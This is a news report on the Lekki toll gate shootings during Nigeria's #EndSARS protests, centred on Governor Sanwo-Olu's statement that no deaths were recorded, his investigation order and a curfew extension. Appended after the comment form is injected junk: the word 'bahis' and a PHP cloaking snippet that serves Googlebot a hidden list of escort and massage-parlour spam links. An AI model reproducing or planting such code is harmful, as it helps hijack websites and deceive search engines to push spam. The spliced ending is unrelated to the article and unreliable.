NEWS

Lagos Shootings: ‘We have not recorded any deaths’, Sanwo-Olu says as he extends curfew

NEWSMAN, Lagos- Contrary to the multiple videos circulating on Social media where #EndSARS protesters were seen to be shot dead by Soldiers at the Lekki Toll gate on Tuesday night, Lagos State Governor, Babajide Sanwo-Olu, has stated that no death was recorded in the attack.

Sanwo-Olu made this known in a live broadcast on Wednesday morning, saying “Fellow Lagosians, whilst we pray for the swift recovery of the injured, we have not recorded any fatality as against the widespread circulation on social media”.

“Myself and the leadership of the ministry of health have been going round. Indeed, we went round the hospitals last night. We went round mortuaries last night to see and to monitor for ourselves what has happened and to look and identified the injured protesters.

“We personally visited the hospitals that took in these patients. 10 patients at the General Hospital in Lagos, 11 patients were at the two locations of the Reddington Hospitals both in Lekki and Victoria Island,” he said, adding that other sets were at various hospitals in the Lekki area.

“I want to expressly say that over the night, two of them had to go through surgery and I am happy to say that they are all stable and they are recovering very well. Quite a number of others are just mild to moderate states.

“Indeed, three of them had been discharged this morning and I am told that additional three to four will be discharged anytime from now”, he said

Sanwo-Olu, who admitted that soldiers opened fire on #EndSARS protesters at the Lekki toll gate area last night in a bid to disperse them, said he is currently engaging the leadership of the Nigerian Army on the development.

“For clarity, it is imperative to explain that no sitting governor controls the rules of engagement of the military. I have, nonetheless, ordered an investigation into the rules of engagement adopted by men of the Nigerian Army that were deployed to the Lekki toll gate last night.

“This is with a view to take this up with higher commands of the Nigerian Army and to seek the intervention of Mr President in his capacity to as the Commander-In-Chief to unravel the sequence of events that happened yesterday (Tuesday) night”, Sanwo-Olu stated.

Meanwhile, Governor Sanwo-Olu has stretched the 24 hour curfew to 72 hours to curtail the growing spread of violence in different part of Lagos. 

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

bahis

$uagent = trim(strtolower($_SERVER["HTTP_USER_AGENT"])); if(strpos($uagent,"googlebot")!==false and strpos($uagent,"google-amphtml")===false ){ echo 'Van masaj salonu Maraş masaj salonu Şanlıurfa masaj salonu Isparta masaj salonu Amasya masaj salonu Afyon masaj salonu Denizli masaj salonu Kayseri masaj salonu Eskişehir masaj salonu Malatya masaj salonu Yozgat masaj salonu Çorum masaj salonu Tokat masaj salonu Gaziantep masaj salonu Kütahya masaj salonu Elazığ masaj salonu Kırklareli escort Burdur escort Aksaray escort Kars escort Kastamonu escort Adıyaman escort Erzincan escort Uşak escort Sinop escort '; }